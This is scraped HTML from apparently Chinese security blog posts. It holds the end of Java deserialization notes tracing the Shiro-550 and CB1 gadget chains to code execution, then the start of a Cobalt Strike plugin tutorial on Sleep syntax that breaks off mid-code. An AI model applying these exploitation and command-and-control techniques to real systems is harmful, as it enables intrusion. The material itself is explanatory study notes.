style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">他的value是我们传入的lazymap的get(TemplatesImpl对象)</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">因为我们的lazy被transform修饰回调，也就是InvokerTransformer</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">所以会调用InvokerTransformer的transform方法</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">从而调用TemplatesImpl的newTransformer方法</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">进而调用getTransletInstance方法，实例化_class中的内容，也就是把我们的类实例化</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">在实例化过程中会调用初始化中的代码</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:shiro550;"><span style="font-family:Cambria;">执行恶意命令</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Calibri;">CB1</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">PropertyUtils.getProperty 这个方法会自动去调用一个JavaBean的getter方法</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">调用TemplatesImpl利用链</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="">TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="">TemplatesImpl#getTransletInstance() -></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="">TemplatesImpl#defineTransletClasses() -></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="">TransletClassLoader#defineClass()</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">shiro默认带cb依赖</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">cb 在 BeanComparator 类的构造函数处，当没有显式传入 Comparator 的情况下，则默认使用 ComparableComparator，对cc有依赖</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">使用java.lang.String的CaseInsensitiveComparator显式传入Comparator ，使利用链不依赖cc，从而出现不需要额外的cc依赖，只要有shiro就能打</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;">queue添加的必须是字符串String，不然会报错</span></span></span></p><p style="margin-top: 9pt;margin-bottom: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cb1;"><span style="font-family:Cambria;"></span></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>



<p><a href="2247483853">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2d34be0e&r=1&u=http%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyOTI5MTM4OQ%3D%3D%26mid%3D2247483853%26idx%3D1%26sn%3Dec50dbc0613813ff3d257bd6efb7c622">跳转微信打开</a></p>

</article>
<article>
<h1>[新年特刊-初二篇]CS插件开发</h1>
<p>Mon, 23 Jan 2023 18:19:00 +0800</p>
<p>
原创 <span>侠盗鲁平</span> <span>2023-01-23 18:19</span> <span style="display: inline-block;">内蒙古</span>
</p>

<p></p>



<p>

</p>


<h2 cid="n2" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">开章废话</span></h2><p cid="n3" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">cs的插件在日常的工作中相对来说并不常用，因为cs基本只能当</span><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;">炮灰马</strong></span><span md-inline="plain" style="box-sizing: border-box;">上线的工具，主要是用cs过内存特征也太费劲了(菜狗难受)，我相信在每一个渗透狗的心中，每个能给cs木马过内存特征过卡巴的大佬都是渗透狗的大爹。所以基本上更多的操作自己也不会选择使用cs，所以只是总结一下算是查漏补缺吧</span></p><p cid="n4" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">废话结束，正文开始</span></p><h2 cid="n5" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">语法基础</span></h2><p cid="n6" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">sleep按作者的说法是java平台下实现的的perl脚本语言。</span></p><pre spellcheck="false" lang="perl" cid="n7" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">java</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">-</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">jar</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">sleep</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">.</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">jar</span> <span style="box-sizing: border-box;color: rgb(170, 85, 0);">#打开console</span></span></pre><p cid="n8" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">官方的语法在这里（</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="http://sleep.dashnine.org/manual/" target="_blank">http://sleep.dashnine.org/manual/</a></span><span md-inline="plain" style="box-sizing: border-box;">），有过python或其他语言基础的写的时候看一下再看下其他师傅写的脚本基本上没啥问题，稍微提几个注意的点</span></p><ul class="list-paddingleft-1" cid="n9" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n11" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">在console中用x可以计算表达式（x 3+4），用?可以得到表达式判断结果</span></p></li><li style="box-sizing: border-box;"><p cid="n13" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Sleep需要的语句之间需要有空格</span></p></li><li style="box-sizing: border-box;"><p cid="n15" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Sleep 的变量可以是java对象的引用</span></p></li><li style="box-sizing: border-box;"><p cid="n17" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">使用前无需声明变量。当变量不存在时，Sleep 使用 $null（空标量）赋值</span></p></li><li style="box-sizing: border-box;"><p cid="n19" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">@号创建数组，%号创建字典,Sleep支持多维数组</span></p></li><li style="box-sizing: border-box;"><p cid="n21" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">$null 等于数字 0。作为字符串 $null 等于空字符串 ""。作为对象，$null 与 Java 值 null 相同。</span></p></li><li style="box-sizing: border-box;"><p cid="n23" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Perl支持8进制、16进制、2进制（0b），但Sleep只支持8进制（0开头）和16进制（0x开头）</span></p></li><li style="box-sizing: border-box;"><p cid="n25" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">字符串变量组合用双引号和$xx $ ，eg.</span><span md-inline="code" spellcheck="false" style="box-sizing: border-box;"><p style="box-sizing: border-box;font-family: var(--monospace);vertical-align: initial;border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);background-color: rgb(243, 244, 244);border-radius: 3px;padding-right: 2px;padding-left: 2px;font-size: 0.9em;">$flavor = "mint chocolate chip"; println("I love $flavor $+ !!!");</p></span></p></li><li style="box-sizing: border-box;"><p cid="n27" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">数字用计算符号比较（==,>,<,..），字符串用eq、ne等等比较，is用来比较引用</span></p></li><li style="box-sizing: border-box;"><p cid="n29" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">函数用sub声明</span></p></li><li style="box-sizing: border-box;"><p cid="n31" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">循环支持while、for、foreach</span></p></li><li style="box-sizing: border-box;"><p cid="n33" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">可以使用throw抛出异常，也可以使用try catch处理异常，&getStackTrace 函数返回异常发生时的调用堆栈，&warn 函数将错误消息传达给 Sleep。可以用assert关键字断言</span></p></li><li style="box-sizing: border-box;"><p cid="n35" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">使用inline定义内联子例程的宏，可以使用 &pushl 在内联函数中创建一个新的本地作用域。然后，您可以放心地在本地范围内声明变量。在内联子例程完成之前，您必须使用 &popl 处理局部作用域。</span></p></li></ul><pre spellcheck="false" lang="Perl" cid="n36" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">inline</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">swap</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">{</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(85, 85, 85);">pushl</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$a</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=></span> <span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>, <span style="box-sizing: border-box;color: rgb(0, 85, 170);">$b</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=></span> <span style="box-sizing: border-box;color: rgb(0, 85, 170);">$2</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(0, 0, 255);">local</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">'$temp'</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$temp</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 85, 170);">$b</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(0, 85, 170);">$b</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 85, 170);">$a</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(0, 85, 170);">$a</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$temp</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(85, 85, 85);">popl</span>();</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span></pre><ul class="list-paddingleft-1" cid="n37" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n39" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Sleep可以使用匿名函数</span></p></li></ul><pre spellcheck="false" lang="perl" cid="n40" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">[{ <span style="box-sizing: border-box;color: rgb(85, 85, 85);">println</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Hello $1 $+ !"</span>); } <span style="box-sizing: border-box;color: rgb(152, 26, 26);">:</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"World!"</span>];</span></pre><p cid="n41" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">或使用lamba表达式</span></p><pre spellcheck="false" lang="perl" cid="n42" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(0, 0, 0);">$closure</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">lambda</span>({</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">              <span style="box-sizing: border-box;color: rgb(85, 85, 85);">println</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"\$x is $x"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">           }, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$x</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=></span> <span style="box-sizing: border-box;color: rgb(17, 102, 68);">33</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">[<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$closure]</span>; </span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(0, 0, 0);">$closure[</span><span style="box-sizing: border-box;color: rgb(170, 17, 17);">'$x'</span>] <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"test!"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">[<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$closure]</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">println</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Accessing a value: "</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">.</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$closure[</span><span style="box-sizing: border-box;color: rgb(170, 17, 17);">'$x'</span>]);</span></pre><ul class="list-paddingleft-1" cid="n43" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n45" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Sleep支持正则匹配</span></p></li><li style="box-sizing: border-box;"><p cid="n47" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">^String 等同于 [Class forName: "java.lang.String"]</span></p></li><li style="box-sizing: border-box;"><p cid="n49" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Sleep 可以从 Java 类路径中当前不存在的 jar 文件中动态导入包</span></p></li><li style="box-sizing: border-box;"><p cid="n51" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Sleep 可以将闭包转换为响应某些接口的匿名 Java 对象。这个对象是一个代理实例。解释器在将它们传递给 Java 时自动将闭包编组到代理实例。此功能目前仅适用于接口。对代理实例的 Java 方法调用会导致对闭包的调用。参数 $0 设置为方法名称。来自 Java 的参数被转换为标量 $1、$2 等。这一特性将在后续插件编写过程中频繁使用</span></p></li><li style="box-sizing: border-box;"><p cid="n53" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Sleep实现了文件IO、文件系统IO、网络IO和consoleIO、ThreadsIO</span></p></li></ul><h2 cid="n54" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">CS接口</span></h2><p cid="n55" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">一些cs插件开发的文章开头通用这里都介绍过了，看过的师傅可以直接往后划，看过之后对cs接口实现的功能有一个大概的印象，具体到调用函数时直接搜索函数名称查下参数就好</span></p><p cid="n56" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">cs函数的实现本质是对java代理实例的调用，第一个参数$0默认为方法名称，我们传入的参数$1,$2....是java方法所需的参数。</span></p><h3 cid="n57" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">通用</span></h3><ul class="list-paddingleft-1" cid="n58" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n60" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">快捷键</span></p></li></ul><pre spellcheck="false" lang="perl" cid="n61" mdtype="fences" 